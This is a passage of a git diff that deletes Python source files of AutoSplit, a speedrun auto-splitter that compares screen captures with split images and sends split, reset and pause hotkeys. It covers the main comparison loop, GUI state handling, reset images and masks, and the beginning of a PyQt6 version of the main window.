startUndoSplit(self): - self.undoSplitSignal.emit() - - def startPause(self): - self.pauseSignal.emit() - - def autoSplitter(self): - # error checking: - if str(self.splitimagefolderLineEdit.text()) == 'No Folder Selected': - self.guiChangesOnReset() - self.splitImageDirectoryError() - return - if os.path.exists(self.splitimagefolderLineEdit.text()) == False: - self.guiChangesOnReset() - self.splitImageDirectoryNotFoundError() - return - if self.hwnd == 0 or win32gui.GetWindowText(self.hwnd) == '': - self.guiChangesOnReset() - self.regionError() - return - - # get split image filenames - self.split_image_filenames = os.listdir(self.split_image_directory) - - # Make sure that each of the images follows the guidelines for correct format - # according to all of the settings selected by the user. - for image in self.split_image_filenames: - - # Check to make sure the file is actually an image format that can be opened - # according to the mask flag - if split_parser.flags_from_filename(image) & 0x02 == 0x02: - source = cv2.imread(self.split_image_directory + image, cv2.IMREAD_UNCHANGED) - - if source is None: - # Opencv couldn't open this file as an image, this isn't a correct - # file format that is supported - self.guiChangesOnReset() - self.imageTypeError(image) - return - - if source.shape[2] != 4: - # Error, this file doesn't have an alpha channel even - # though the flag for masking was added - self.guiChangesOnReset() - self.alphaChannelError(image) - return - - else: - if cv2.imread(self.split_image_directory + image, cv2.IMREAD_COLOR) is None: - # Opencv couldn't open this file as an image, this isn't a correct - # file format that is supported - self.guiChangesOnReset() - self.imageTypeError(image) - return - - #error out if there is a {p} flag but no pause hotkey set. - if self.pausehotkeyLineEdit.text() == '' and split_parser.flags_from_filename(image) & 0x08 == 0x08: - self.guiChangesOnReset() - self.pauseHotkeyError() - return - - if self.custompausetimesCheckBox.isChecked() and split_parser.pause_from_filename(image) is None: - # Error, this file doesn't have a pause, but the checkbox was - # selected for unique pause times - self.guiChangesOnReset() - self.customPauseError(image) - return - - if self.customthresholdsCheckBox.isChecked() and split_parser.threshold_from_filename(image) is None: - # Error, this file doesn't have a threshold, but the checkbox - # was selected for unique thresholds - self.guiChangesOnReset() - self.customThresholdError(image) - return - - if self.splitLineEdit.text() == '': - self.guiChangesOnReset() - self.splitHotkeyError() - return - - # find reset image then remove it from the list - self.findResetImage() - - # Check that there's only one reset image - for image in self.split_image_filenames: - - if split_parser.is_reset_image(image): - self.guiChangesOnReset() - self.multipleResetImagesError() - return - - # if there is no custom threshold for the reset image, throw an error. - if self.reset_image is not None and self.reset_image_threshold is None: - self.guiChangesOnReset() - self.noResetImageThresholdError() - return - - # If there is no reset hotkey set but a reset image is present, throw an error. - if self.resetLineEdit.text() == '' and self.reset_image is not None: - self.guiChangesOnReset() - self.resetHotkeyError() - return - - # construct groups of splits if needed - self.split_groups = [] - if self.groupDummySplitsCheckBox.isChecked(): - current_group = [] - self.split_groups.append(current_group) - - for i, image in enumerate(self.split_image_filenames): - current_group.append(i) - - flags = split_parser.flags_from_filename(image) - if flags & 0x01 != 0x01 and i < len(self.split_image_filenames) - 1: - current_group = [] - self.split_groups.append(current_group) - - # construct dummy splits array - self.dummy_splits_array = [] - for i, image in enumerate(self.split_image_filenames): - if split_parser.flags_from_filename(image) & 0x01 == 0x01: - self.dummy_splits_array.append(True) - else: - self.dummy_splits_array.append(False) - - # construct loop amounts for each split image - self.split_image_loop_amount = [] - for i, image in enumerate(self.split_image_filenames): - self.split_image_loop_amount.append(split_parser.loop_from_filename(image)) - - if any(x > 1 for x in self.split_image_loop_amount) and self.groupDummySplitsCheckBox.isChecked() == True: - self.dummySplitsError() - return - - self.guiChangesOnStart() - - # initialize some settings - self.split_image_number = 0 - self.loop_number = 1 - self.number_of_split_images = len(self.split_image_filenames) - self.waiting_for_split_delay = False - self.split_below_threshold = False - - self.run_start_time = time.time() - - # First while loop: stays in this loop until all of the split images have been split - while self.split_image_number < self.number_of_split_images: - - # Check if we are not waiting for the split delay to send the key press - if self.waiting_for_split_delay == True: - time_millis = int(round(time.time() * 1000)) - if time_millis < self.split_time: - QtWidgets.QApplication.processEvents() - continue - - self.updateSplitImage() - - # second while loop: stays in this loop until similarity threshold is met - # skip loop if we just finished waiting for the split delay and need to press the split key! - start = time.time() - while True: - # reset if the set screen region window was closed - if win32gui.GetWindowText(self.hwnd) == '': - self.reset() - - # loop goes into here if start auto splitter text is "Start Auto Splitter" - if self.startautosplitterButton.text() == 'Start Auto Splitter': - if self.autostartonresetCheckBox.isChecked(): - self.startAutoSplitterSignal.emit() - return - else: - self.guiChangesOnReset() - return - - # calculate similarity for reset image - reset_masked = None - capture = None - - if self.shouldCheckResetImage(): - reset_masked = (self.reset_mask is not None) - capture = self.getCaptureForComparison(reset_masked) - - reset_similarity = self.compareImage(self.reset_image, self.reset_mask, capture) - if reset_similarity >= self.reset_image_threshold: - keyboard.send(str(self.resetLineEdit.text())) - self.reset() - - # loop goes into here if start auto splitter text is "Start Auto Splitter" - if self.startautosplitterButton.text() == 'Start Auto Splitter': - if self.autostartonresetCheckBox.isChecked(): - self.startAutoSplitterSignal.emit() - return - else: - self.guiChangesOnReset() - return - - # get capture again if needed - masked = (self.flags & 0x02 == 0x02) - if capture is None or masked != reset_masked: - capture = self.getCaptureForComparison(masked) - - # calculate similarity for split image - self.similarity = self.compareImage(self.split_image, self.mask, capture) - - # show live similarity if the checkbox is checked - if self.showlivesimilarityCheckBox.isChecked(): - self.livesimilarityLabel.setText(str(self.similarity)[:4]) - else: - self.livesimilarityLabel.setText(' ') - - # if the similarity becomes higher than highest similarity, set it as such. - if self.similarity > self.highest_similarity: - self.highest_similarity = self.similarity - - # show live highest similarity if the checkbox is checked - if self.showhighestsimilarityCheckBox.isChecked(): - self.highestsimilarityLabel.setText(str(self.highest_similarity)[:4]) - else: - self.highestsimilarityLabel.setText(' ') - - # if its the last split image and last loop number, disable the skip split button - if (self.split_image_number == self.number_of_split_images - 1 and self.loop_number == self.split_image_loop_amount[self.split_image_number]) or (self.groupDummySplitsCheckBox.isChecked() == True and self.dummy_splits_array[self.split_image_number:].count(False) <= 1): - self.skipsplitButton.setEnabled(False) - else: - self.skipsplitButton.setEnabled(True) - - # if its the first split image and first loop, disable the undo split button - if self.split_image_number == 0 and self.loop_number == 1: - self.undosplitButton.setEnabled(False) - else: - self.undosplitButton.setEnabled(True) - - # if the b flag is set, let similarity go above threshold first, then split on similarity below threshold. - # if no b flag, just split when similarity goes above threshold. - if self.flags & 0x04 == 0x04 and self.split_below_threshold == False: - if self.waiting_for_split_delay == False and self.similarity >= self.similaritythresholdDoubleSpinBox.value(): - self.split_below_threshold = True - continue - elif self.flags & 0x04 == 0x04 and self.split_below_threshold == True: - if self.waiting_for_split_delay == False and self.similarity < self.similaritythresholdDoubleSpinBox.value(): - self.split_below_threshold = False - break - else: - if self.waiting_for_split_delay == False and self.similarity >= self.similaritythresholdDoubleSpinBox.value(): - break - - # limit the number of time the comparison runs to reduce cpu usage - fps_limit = self.fpslimitSpinBox.value() - time.sleep((1 / fps_limit) - (time.time() - start) % (1 / fps_limit)) - QtWidgets.QApplication.processEvents() - - # comes here when threshold gets met - - # We need to make sure that this isn't a dummy split before sending - # the key press. - if (self.flags & 0x01 == 0x01): - pass - else: - # If it's a delayed split, check if the delay has passed - # Otherwise calculate the split time for the key press - if self.split_delay > 0 and self.waiting_for_split_delay == False: - self.split_time = int(round(time.time() * 1000)) + self.split_delay - self.waiting_for_split_delay = True - self.undosplitButton.setEnabled(False) - self.skipsplitButton.setEnabled(False) - self.currentsplitimagefileLabel.setText(' ') - self.currentSplitImage.setAlignment(QtCore.Qt.AlignCenter) - - # check for reset while delayed and display a counter of the remaining split delay time - delay_start_time = time.time() - while time.time() - delay_start_time < (self.split_delay / 1000): - self.delay_time_left = str(round((self.split_delay / 1000) - (time.time() - delay_start_time), 1)) - self.currentSplitImage.setText('Delayed Split: ' + self.delay_time_left + ' sec remaining') - # check for reset - if win32gui.GetWindowText(self.hwnd) == '': - self.reset() - if self.startautosplitterButton.text() == 'Start Auto Splitter': - if self.autostartonresetCheckBox.isChecked(): - self.startAutoSplitterSignal.emit() - return - else: - self.guiChangesOnReset() - return - - # calculate similarity for reset image - if self.shouldCheckResetImage() == True: - reset_masked = (self.reset_mask is not None) - capture = self.getCaptureForComparison(reset_masked) - - reset_similarity = self.compareImage(self.reset_image, self.reset_mask, capture) - if reset_similarity >= self.reset_image_threshold: - keyboard.send(str(self.resetLineEdit.text())) - self.reset() - continue - - QtTest.QTest.qWait(1) - - self.waiting_for_split_delay = False - - # if {p} flag hit pause key, otherwise hit split hotkey - if (self.flags & 0x08 == 0x08): - keyboard.send(str(self.pausehotkeyLineEdit.text())) - else: - keyboard.send(str(self.splitLineEdit.text())) - - # increase loop number if needed, set to 1 if it was the last loop. - if self.loop_number < self.split_image_loop_amount[self.split_image_number]: - self.loop_number = self.loop_number + 1 - else: - self.loop_number = 1 - - # if loop check box is checked and its the last split, go to first split. - # else if current loop amount is back to 1, add 1 to split image number - # else pass, dont change split image number. - if self.loopCheckBox.isChecked() and self.split_image_number == self.number_of_split_images - 1 and self.loop_number == 1: - self.split_image_number = 0 - elif self.loop_number == 1: - self.split_image_number = self.split_image_number + 1 - else: - pass - - # set a "pause" split image number. This is done so that it can detect if user hit split/undo split while paused. - pause_split_image_number = self.split_image_number - pause_loop_number = self.loop_number - - # if its not the last split image, pause for the amount set by the user - if self.number_of_split_images != self.split_image_number: - # set current split image to none - self.currentsplitimagefileLabel.setText(' ') - self.currentSplitImage.setAlignment(QtCore.Qt.AlignCenter) - self.imageloopLabel.setText('Image Loop #: -') - - # if its the last split image and last loop number, disable the skip split button - if (self.split_image_number == self.number_of_split_images - 1 and self.loop_number == self.split_image_loop_amount[self.split_image_number]) or (self.groupDummySplitsCheckBox.isChecked() == True and self.dummy_splits_array[self.split_image_number:].count(False) <= 1): - self.skipsplitButton.setEnabled(False) - else: - self.skipsplitButton.setEnabled(True) - - # if its the first split image and first loop, disable the undo split button - if self.split_image_number == 0 and self.loop_number == 1: - self.undosplitButton.setEnabled(False) - else: - self.undosplitButton.setEnabled(True) - - QtWidgets.QApplication.processEvents() - - # I have a pause loop here so that it can check if the user presses skip split, undo split, or reset here. - # Also updates the current split image text, counting down the time until the next split image - pause_start_time = time.time() - while time.time() - pause_start_time < self.pauseDoubleSpinBox.value(): - self.pause_time_left = str(round((self.pauseDoubleSpinBox.value()) - (time.time() - pause_start_time), 1)) - self.currentSplitImage.setText('None (Paused). ' + self.pause_time_left + ' sec remaining') - - # check for reset - if win32gui.GetWindowText(self.hwnd) == '': - self.reset() - if self.startautosplitterButton.text() == 'Start Auto Splitter': - if self.autostartonresetCheckBox.isChecked(): - self.startAutoSplitterSignal.emit() - return - else: - self.guiChangesOnReset() - return - - # check for skip/undo split: - if self.split_image_number != pause_split_image_number or self.loop_number != pause_loop_number: - break - - # calculate similarity for reset image - if self.shouldCheckResetImage() == True: - reset_masked = (self.reset_mask is not None) - capture = self.getCaptureForComparison(reset_masked) - - reset_similarity = self.compareImage(self.reset_image, self.reset_mask, capture) - if reset_similarity >= self.reset_image_threshold: - keyboard.send(str(self.resetLineEdit.text())) - self.reset() - continue - - QtTest.QTest.qWait(1) - - # loop breaks to here when the last image splits - self.guiChangesOnReset() - - def guiChangesOnStart(self): - self.startautosplitterButton.setText('Running..') - self.browseButton.setEnabled(False) - self.startautosplitterButton.setEnabled(False) - self.resetButton.setEnabled(True) - self.undosplitButton.setEnabled(True) - self.skipsplitButton.setEnabled(True) - self.setsplithotkeyButton.setEnabled(False) - self.setresethotkeyButton.setEnabled(False) - self.setskipsplithotkeyButton.setEnabled(False) - self.setundosplithotkeyButton.setEnabled(False) - self.setpausehotkeyButton.setEnabled(False) - self.custompausetimesCheckBox.setEnabled(False) - self.customthresholdsCheckBox.setEnabled(False) - self.groupDummySplitsCheckBox.setEnabled(False) - QtWidgets.QApplication.processEvents() - - def guiChangesOnReset(self): - self.startautosplitterButton.setText('Start Auto Splitter') - self.imageloopLabel.setText("Image Loop #:") - self.currentSplitImage.setText(' ') - self.currentsplitimagefileLabel.setText(' ') - self.livesimilarityLabel.setText(' ') - self.highestsimilarityLabel.setText(' ') - self.browseButton.setEnabled(True) - self.startautosplitterButton.setEnabled(True) - self.resetButton.setEnabled(False) - self.undosplitButton.setEnabled(False) - self.skipsplitButton.setEnabled(False) - self.setsplithotkeyButton.setEnabled(True) - self.setresethotkeyButton.setEnabled(True) - self.setskipsplithotkeyButton.setEnabled(True) - self.setundosplithotkeyButton.setEnabled(True) - self.setpausehotkeyButton.setEnabled(True) - self.custompausetimesCheckBox.setEnabled(True) - self.customthresholdsCheckBox.setEnabled(True) - self.groupDummySplitsCheckBox.setEnabled(True) - QtWidgets.QApplication.processEvents() - - def compareImage(self, image, mask, capture): - if mask is None: - if self.comparisonmethodComboBox.currentIndex() == 0: - return compare.compare_l2_norm(image, capture) - elif self.comparisonmethodComboBox.currentIndex() == 1: - return compare.compare_histograms(image, capture) - elif self.comparisonmethodComboBox.currentIndex() == 2: - return compare.compare_phash(image, capture) - else: - if self.comparisonmethodComboBox.currentIndex() == 0: - return compare.compare_l2_norm_masked(image, capture, mask) - elif self.comparisonmethodComboBox.currentIndex() == 1: - return compare.compare_histograms_masked(image, capture, mask) - elif self.comparisonmethodComboBox.currentIndex() == 2: - return compare.compare_phash_masked(image, capture, mask) - - def getCaptureForComparison(self, masked): - # grab screenshot of capture region - capture = capture_windows.capture_region(self.hwnd, self.rect) - - # if flagged as a mask, capture with nearest neighbor interpolation. else don't so that - # threshold settings on versions below 1.2.0 aren't messed up - if (masked): - capture = cv2.resize(capture, (self.RESIZE_WIDTH, self.RESIZE_HEIGHT), interpolation=cv2.INTER_NEAREST) - else: - capture = cv2.resize(capture, (self.RESIZE_WIDTH, self.RESIZE_HEIGHT)) - - # convert to BGR - capture = cv2.cvtColor(capture, cv2.COLOR_BGRA2BGR) - - return capture - - def shouldCheckResetImage(self): - if self.reset_image is not None and time.time() - self.run_start_time > self.reset_image_pause_time: - return True - - return False - - def findResetImage(self): - self.reset_image = None - self.reset_mask = None - self.reset_image_threshold = None - - reset_image_file = None - for i, image in enumerate(self.split_image_filenames): - if split_parser.is_reset_image(image): - reset_image_file = image - break - - if reset_image_file is None: - return - - self.split_image_filenames.remove(reset_image_file) - - # create reset image and keep in memory - path = self.split_image_directory + reset_image_file - flags = split_parser.flags_from_filename(reset_image_file) - - self.reset_image_threshold = split_parser.threshold_from_filename(reset_image_file) - - self.reset_image_pause_time = split_parser.pause_from_filename(reset_image_file) - if self.reset_image_pause_time is None: - self.reset_image_pause_time = 0 - - # if theres a mask flag, create a mask - if (flags & 0x02 == 0x02): - # create mask based on resized, nearest neighbor interpolated split image - self.reset_image = cv2.imread(path, cv2.IMREAD_UNCHANGED) - self.reset_image = cv2.resize(self.reset_image, (self.RESIZE_WIDTH, self.RESIZE_HEIGHT), - interpolation=cv2.INTER_NEAREST) - lower = np.array([0, 0, 0, 1], dtype="uint8") - upper = np.array([255, 255, 255, 255], dtype="uint8") - self.reset_mask = cv2.inRange(self.reset_image, lower, upper) - - # set split image as BGR - self.reset_image = cv2.cvtColor(self.reset_image, cv2.COLOR_BGRA2BGR) - - # else if there is no mask flag, open image normally. don't interpolate nearest neighbor here so setups before 1.2.0 still work. - else: - self.reset_image = cv2.imread(path, cv2.IMREAD_COLOR) - self.reset_image = cv2.resize(self.reset_image, (self.RESIZE_WIDTH, self.RESIZE_HEIGHT)) - - def updateSplitImage(self): - - # get split image path - split_image_file = self.split_image_filenames[0 + self.split_image_number] - self.split_image_path = self.split_image_directory + split_image_file - - # get flags - self.flags = split_parser.flags_from_filename(split_image_file) - - # set current split image in UI - # if flagged as mask, transform transparency into UI's gray BG color - if (self.flags & 0x02 == 0x02): - self.split_image_display = cv2.imread(self.split_image_path, cv2.IMREAD_UNCHANGED) - transparent_mask = self.split_image_display[:, :, 3] == 0 - self.split_image_display[transparent_mask] = [240, 240, 240, 255] - self.split_image_display = cv2.cvtColor(self.split_image_display, cv2.COLOR_BGRA2RGB) - self.split_image_display = cv2.resize(self.split_image_display, (240, 180)) - # if not flagged as mask, open normally - else: - self.split_image_display = cv2.imread(self.split_image_path, cv2.IMREAD_COLOR) - self.split_image_display = cv2.cvtColor(self.split_image_display, cv2.COLOR_BGR2RGB) - self.split_image_display = cv2.resize(self.split_image_display, (240, 180)) - - qImg = QtGui.QImage(self.split_image_display, self.split_image_display.shape[1], - self.split_image_display.shape[0], self.split_image_display.shape[1] * 3, - QtGui.QImage.Format_RGB888) - self.updateCurrentSplitImage.emit(qImg) - self.currentsplitimagefileLabel.setText(split_image_file) - - # if theres a mask flag, create a mask - if (self.flags & 0x02 == 0x02): - - # create mask based on resized, nearest neighbor interpolated split image - self.split_image = cv2.imread(self.split_image_path, cv2.IMREAD_UNCHANGED) - self.split_image = cv2.resize(self.split_image, (self.RESIZE_WIDTH, self.RESIZE_HEIGHT), - interpolation=cv2.INTER_NEAREST) - lower = np.array([0, 0, 0, 1], dtype="uint8") - upper = np.array([255, 255, 255, 255], dtype="uint8") - self.mask = cv2.inRange(self.split_image, lower, upper) - - # set split image as BGR - self.split_image = cv2.cvtColor(self.split_image, cv2.COLOR_BGRA2BGR) - - # else if there is no mask flag, open image normally. don't interpolate nearest neighbor here so setups before 1.2.0 still work. - else: - split_image = cv2.imread(self.split_image_path, cv2.IMREAD_COLOR) - self.split_image = cv2.resize(split_image, (self.RESIZE_WIDTH, self.RESIZE_HEIGHT)) - self.mask = None - - # If the unique parameters are selected, go ahead and set the spinboxes to those values - if self.custompausetimesCheckBox.isChecked(): - self.pauseDoubleSpinBox.setValue(split_parser.pause_from_filename(split_image_file)) - - if self.customthresholdsCheckBox.isChecked(): - self.similaritythresholdDoubleSpinBox.setValue(split_parser.threshold_from_filename(split_image_file)) - - # Get delay for split, if any - self.split_delay = split_parser.delay_from_filename(split_image_file) - - # Set Image Loop # - self.imageloopLabel.setText("Image Loop #: " + str(self.loop_number)) - - # need to set split below threshold to false each time an image updates. - self.split_below_threshold = False - - self.similarity = 0 - self.highest_similarity = 0.001 - - # exit safely when closing the window - def closeEvent(self, event): - if self.haveSettingsChanged(): - #give a different warning if there was never a settings file that was loaded successfully, and save as instead of save. - if self.last_successfully_loaded_settings_file_path == None: - msgBox = QtWidgets.QMessageBox - warning = msgBox.warning(self, "AutoSplit","Do you want to save changes made to settings file Untitled?", msgBox.Yes | msgBox.No | msgBox.Cancel) - if warning == msgBox.Yes: - self.saveSettingsAs() - sys.exit() - event.accept() - if warning == msgBox.No: - event.accept() - sys.exit() - pass - if warning == msgBox.Cancel: - event.ignore() - return - else: - msgBox = QtWidgets.QMessageBox - warning = msgBox.warning(self, "AutoSplit", "Do you want to save the changes made to the settings file " + os.path.basename(self.last_successfully_loaded_settings_file_path) + " ?", msgBox.Yes | msgBox.No | msgBox.Cancel) - if warning == msgBox.Yes: - self.saveSettings() - sys.exit() - event.accept() - if warning == msgBox.No: - event.accept() - sys.exit() - pass - if warning == msgBox.Cancel: - event.ignore() - return - else: - event.accept() - sys.exit() - - - -def main(): - app = QtWidgets.QApplication(sys.argv) - app.setWindowIcon(QtGui.QIcon('icon.ico')) - w = AutoSplit() - w.setWindowIcon(QtGui.QIcon('icon.ico')) - w.show() - sys.exit(app.exec_()) - - -if __name__ == '__main__': - main() diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$AutoSplit.py.target.py b/v1/data/codefile/toufool@auto-split__86244b6__src$AutoSplit.py.target.py deleted file mode 100644 index 6101253..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$AutoSplit.py.target.py +++ /dev/null @@ -1,965 +0,0 @@ -#!/usr/bin/python3.9 -# -*- coding: utf-8 -*- - -from PyQt6 import QtCore, QtGui, QtTest, QtWidgets -from win32 import win32gui -import sys -import os -import cv2 -import time -import ctypes.wintypes -import ctypes -import keyboard -import numpy as np - -import design -import compare -import capture_windows -import split_parser - - -class AutoSplit(QtWidgets.QMainWindow, design.Ui_MainWindow): - from hotkeys import ( - beforeSettingHotkey, afterSettingHotkey, setSplitHotkey, setResetHotkey, setSkipSplitHotkey, setUndoSplitHotkey, - setPauseHotkey) - from error_messages import ( - splitImageDirectoryError, splitImageDirectoryNotFoundError, imageTypeError, regionError, regionSizeError, - splitHotkeyError, customThresholdError, customPauseError, alphaChannelError, alignRegionImageTypeError, - oldVersionSettingsFileError, noSettingsFileOnOpenError, tooManySettingsFilesOnOpenError, invalidSettingsError) - from settings_file import saveSettings, saveSettingsAs, loadSettings, haveSettingsChanged, getSaveSettingsValues - from screen_region import selectRegion, selectWindow, alignRegion - from menu_bar import about, viewHelp - - myappid = u'mycompany.myproduct.subproduct.version' - ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid) - - # signals - updateCurrentSplitImage = QtCore.pyqtSignal(QtGui.QImage) - startAutoSplitterSignal = QtCore.pyqtSignal() - resetSignal = QtCore.pyqtSignal() - skipSplitSignal = QtCore.pyqtSignal() - undoSplitSignal = QtCore.pyqtSignal() - pauseSignal = QtCore.pyqtSignal() - afterSettingHotkeySignal = QtCore.pyqtSignal() - - def __init__(self, parent=None): - super(AutoSplit, self).__init__(parent) - self.setupUi(self) - - # close all processes when closing window - self.actionView_Help.triggered.connect(self.viewHelp) - self.actionAbout.triggered.connect(self.about) - self.actionSave_Settings.triggered.connect(self.saveSettings) - self.actionSave_Settings_As.triggered.connect(self.saveSettingsAs) - self.actionLoad_Settings.triggered.connect(self.loadSettings) - - # disable buttons upon open - self.undosplitButton.setEnabled(False) - self.skipsplitButton.setEnabled(False) - self.resetButton.setEnabled(False) - - # resize to these width and height so that FPS performance increases - self.RESIZE_WIDTH = 320 - self.RESIZE_HEIGHT = 240 - - # split image folder line edit text - self.splitimagefolderLineEdit.setText('No Folder Selected') - - # Connecting button clicks to functions - self.browseButton.clicked.connect(self.browse) - self.selectregionButton.clicked.connect(self.selectRegion) - self.takescreenshotButton.clicked.connect(self.takeScreenshot) - self.startautosplitterButton.clicked.connect(self.autoSplitter) - self.checkfpsButton.clicked.connect(self.checkFPS) - self.resetButton.clicked.connect(self.reset) - self.skipsplitButton.clicked.connect(self.skipSplit) - self.undosplitButton.clicked.connect(self.undoSplit) - self.setsplithotkeyButton.clicked.connect(self.setSplitHotkey) - self.setresethotkeyButton.clicked.connect(self.setResetHotkey) - self.setskipsplithotkeyButton.clicked.connect(self.setSkipSplitHotkey) - self.setundosplithotkeyButton.clicked.connect(self.setUndoSplitHotkey) - self.setpausehotkeyButton.clicked.connect(self.setPauseHotkey) - self.alignregionButton.clicked.connect(self.alignRegion) - self.selectwindowButton.clicked.connect(self.selectWindow) - - # update x, y, width, and height when changing the value of these spinbox's are changed - self.xSpinBox.valueChanged.connect(self.updateX) - self.ySpinBox.valueChanged.connect(self.updateY) - self.widthSpinBox.valueChanged.connect(self.updateWidth) - self.heightSpinBox.valueChanged.connect(self.updateHeight) - - # connect signals to functions - self.updateCurrentSplitImage.connect(self.updateSplitImageGUI) - self.afterSettingHotkeySignal.connect(self.afterSettingHotkey) - self.startAutoSplitterSignal.connect(self.autoSplitter) - self.resetSignal.connect(self.reset) - self.skipSplitSignal.connect(self.skipSplit) - self.undoSplitSignal.connect(self.undoSplit) - #self.pauseSignal.connect(self.pause) - - # live image checkbox - self.liveimageCheckBox.clicked.connect(self.checkLiveImage) - self.timerLiveImage = QtCore.QTimer() - self.timerLiveImage.timeout.connect(self.liveImageFunction) - - # Default Settings for the region capture - self.hwnd = 0 - self.hwnd_title = '' - self.rect = ctypes.wintypes.RECT() - - #last loaded settings and last successful loaded settings file path to None until we try to load them - self.last_loaded_settings = None - self.last_successfully_loaded_settings_file_path = None - - # find all .pkls in AutoSplit folder, error if there is none or more than 1 - self.load_settings_on_open = True - self.loadSettings() - self.load_settings_on_open = False - - # initialize a few settings options - self.last_saved_settings = None - - self.live_image_function_on_open = True - - # FUNCTIONS - #TODO add checkbox for going back to image 1 when resetting. - def browse(self): - # User selects the file with the split images in it. - self.split_image_directory = str( - QtWidgets.QFileDialog.getExistingDirectory(self, "Select Split Image Directory")) + '\\' - - # If the user doesn't select a folder, it defaults to \. Set it back to whats in the LineEdit, and return - if self.split_image_directory == '\\': - self.split_image_directory = self.splitimagefolderLineEdit.text() - return - - # set the split image folder line to the directory text - self.splitimagefolderLineEdit.setText(self.split_image_directory) - - def checkLiveImage(self): - if self.liveimageCheckBox.isChecked(): - self.timerLiveImage.start(int(1000 / 60)) - else: - self.timerLiveImage.stop() - self.liveImageFunction() - - def liveImageFunction(self): - try: - if win32gui.GetWindowText(self.hwnd) == '' and self.live_image_function_on_open == True: - self.timerLiveImage.stop() - self.live_image_function_on_open = False - return - - elif win32gui.GetWindowText(self.hwnd) == '' and self.live_image_function_on_open == False: - self.regionError() - self.timerLiveImage.stop() - return - - ctypes.windll.user32.SetProcessDPIAware() - - capture = capture_windows.capture_region(self.hwnd, self.rect) - capture = cv2.resize(capture, (240, 180)) - capture = cv2.cvtColor(capture, cv2.COLOR_BGRA2RGB) - - # Convert to set it on the label - qImg = QtGui.QImage(capture, capture.shape[1], capture.shape[0], capture.shape[1] * 3, - QtGui.QImage.Format.Format_RGB888) - pix = QtGui.QPixmap(qImg) - self.liveImage.setPixmap(pix) - - except AttributeError: - pass - - # update x, y, width, height when spinbox values are changed - def updateX(self): - try: - self.rect.left = self.xSpinBox.value() - self.rect.right = self.rect.left + self.widthSpinBox.value() - self.checkLiveImage() - except AttributeError: - pass - - def updateY(self): - try: - self.rect.top = self.ySpinBox.value() - self.rect.bottom = self.rect.top + self.heightSpinBox.value() - self.checkLiveImage() - except AttributeError: - pass - - def updateWidth(self): - self.rect.right = self.rect.left + self.widthSpinBox.value() - self.checkLiveImage() - - def updateHeight(self): - self.rect.bottom = self.rect.top + self.heightSpinBox.value() - self.checkLiveImage() - - # update current split image. needed this to avoid updating it through the hotkey thread. - def updateSplitImageGUI(self, qImg): - pix = QtGui.QPixmap(qImg) - self.currentSplitImage.setPixmap(pix) - - def takeScreenshot(self): - # error checks - if self.splitimagefolderLineEdit.text() == 'No Folder Selected': - self.splitImageDirectoryError() - return - if os.path.exists(self.splitimagefolderLineEdit.text()) == False: - self.splitImageDirectoryNotFoundError() - return - if self.hwnd == 0 or win32gui.GetWindowText(self.hwnd) == '': - self.regionError() - return - take_screenshot_filename = '001_SplitImage' - - # check if file exists and rename it if it does - # Below starts the FileNameNumber at #001 up to #999. After that it will go to 1000, - # which is a problem, but I doubt anyone will get to 1000 split images... - i = 1 - while os.path.exists(self.split_image_directory + take_screenshot_filename + '.png') == True: - FileNameNumber = (f"{i:03}") - take_screenshot_filename = FileNameNumber + '_SplitImage' - i = i + 1 - - # grab screenshot of capture region - capture = capture_windows.capture_region(self.hwnd, self.rect) - capture = cv2.cvtColor(capture, cv2.COLOR_BGRA2BGR) - - # save and open image - cv2.imwrite(self.split_image_directory + take_screenshot_filename + '.png', capture) - os.startfile(self.split_image_directory + take_screenshot_filename + '.png') - - # check max FPS button connects here. - def checkFPS(self): - # error checking - split_image_directory = self.splitimagefolderLineEdit.text() - if split_image_directory == 'No Folder Selected' or split_image_directory is None: - self.splitImageDirectoryError() - return - - split_image_filenames = os.listdir(split_image_directory) - for image in split_image_filenames: - if cv2.imread(self.split_image_directory + image, cv2.IMREAD_COLOR) is None: - self.imageTypeError(image) - return - else: - pass - - if self.hwnd == 0 or win32gui.GetWindowText(self.hwnd) == '': - self.regionError() - return - - if self.width == 0 or self.height == 0: - self.regionSizeError() - return - - # grab first image in the split image folder - split_image_file = split_image_filenames[0] - split_image_path = split_image_directory + split_image_file - split_image = cv2.imread(split_image_path, cv2.IMREAD_COLOR) - split_image = cv2.cvtColor(split_image, cv2.COLOR_BGR2RGB) - split_image = cv2.resize(split_image, (self.RESIZE_WIDTH, self.RESIZE_HEIGHT)) - - # run 10 iterations of screenshotting capture region + comparison. - count = 0 - t0 = time.time() - while count < 10: - - capture = capture_windows.capture_region(self.hwnd, self.rect) - capture = cv2.resize(capture, (self.RESIZE_WIDTH, self.RESIZE_HEIGHT)) - capture = cv2.cvtColor(capture, cv2.COLOR_BGRA2RGB) - - if self.comparisonmethodComboBox.currentIndex() == 0: - similarity = compare.compare_l2_norm(split_image, capture) - elif self.comparisonmethodComboBox.currentIndex() == 1: - similarity = compare.compare_histograms(split_image, capture) - elif self.comparisonmethodComboBox.currentIndex() == 2: - similarity = compare.compare_phash(split_image, capture) - - count = count + 1 - - # calculate FPS - t1 = time.time() - FPS = int(10 / (t1 - t0)) - FPS = str(FPS) - self.fpsvalueLabel.setText(FPS) - - # undo split button and hotkey connect to here - def undoSplit(self): - if self.undosplitButton.isEnabled() == False: - return - - if self.loop_number != 1 and self.groupDummySplitsCheckBox.isChecked() == False: - self.loop_number = self.loop_number - 1 - - elif self.groupDummySplitsCheckBox.isChecked() == True: - for i, group in enumerate(self.split_groups): - if i > 0 and self.split_image_number in group: - self.split_image_number = self.split_groups[i - 1][0] - break - - else: - self.split_image_number = self.split_image_number - 1 - self.loop_number = self.split_image_loop_amount[self.split_image_number] - - self.updateSplitImage() - - return - - # skip split button and hotkey connect to here - def skipSplit(self): - - if self.skipsplitButton.isEnabled() == False: - return - - if self.loop_number < self.split_image_loop_amount[self.split_image_number] and self.groupDummySplitsCheckBox.isChecked() == False: - self.loop_number = self.loop_number + 1 - elif self.groupDummySplitsCheckBox.isChecked() == True: - for group in self.split_groups: - if self.split_image_number in group: - self.split_image_number = group[-1] + 1 - break - else: - self.split_image_number = self.split_image_number + 1 - self.loop_number = 1 - - self.updateSplitImage() - - return - - #def pause(self): - #TODO add what to do when you hit pause hotkey, if this even needs to be done - - def reset(self): - # when the reset button or hotkey is pressed, it will change this text, which will trigger in the autoSplitter function, if running, to abort and change GUI. - self.startautosplitterButton.setText('Start Auto Splitter') - return - - # functions for the hotkeys to return to the main thread from signals and start their corresponding 